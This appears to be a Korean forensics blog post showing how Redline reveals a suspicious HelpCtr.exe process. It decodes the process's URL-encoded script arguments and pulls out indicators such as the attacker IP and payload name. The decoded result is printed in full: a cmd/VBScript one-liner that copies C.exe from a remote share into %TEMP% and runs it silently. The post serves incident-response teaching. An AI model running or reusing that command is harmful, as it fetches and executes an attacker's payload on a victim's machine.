반응형
Redline을 이용하여 예제문제로 분석해보자
Hierarchical Processess에서 HelpCtr.exe를 상세보기하니 Arguments에 이상한 값이 나타있고
SID값이 500이므로 수상하다.
Arguments값이 URL 인코딩되어있는데 디코딩하면 위와 같은 결과를 확인 할 수 있다.
<프로그램 출처 - http://bbolmin.tistory.com/66 >
<script>부분부터 긁어서 이것을 Ascii코드 Decode를 하면 위와 같은 결과를 알 수 있다.
결과
cmd /c echo WScript.CreateObject("WScript.Shell").Run "cmd /c copy \\192.168.56.130\w\C.exe %TEMP% && %TEMP%\C.exe",0,false>%TEMP%\fW.vbs|cscript %TEMP%\fW.vbs>nul
위의 결과에서 여러가지 정보를 추출 할 수 있다.
TEMP폴더를 사용하며 192.168.56.130이 공격지가 되고 C.exe가 파일이 된다. TEMP폴더를 재부팅하면 없어지는 폴더이기때문에 휘발성이 높은 데이터라고 볼 수 있다. 이렇게 빠르게 데이터를 수집하면 정보를 빨리 찾을 수 있으며 위의 같은 경우에도 어떤 것이 바이러스 인지 알고 있기때문에 빨리 찾은거지 실제로는 많은 시간이 많이 걸리게 된다.
반응형
'Forensic' 카테고리의 다른 글
| DumpIt 다운로드/ 사용법 (0) | 2017.01.03 |
|---|---|
| 메모리 포렌식(Memory Forensic) 종류와 개요 (1) | 2016.12.29 |
| Redline을 사용해 침해사고 컴퓨터 정보/데이터 분석 (Live Response) (0) | 2016.12.28 |
| Redline을 사용해 침해사고 컴퓨터 정보/데이터 수집 스크립트 작성 방법 (0) | 2016.12.27 |
| 침해사고 분석을 위한 디지털 포렌식(Digital Forensic) - 2 (0) | 2016.12.27 |
최근댓글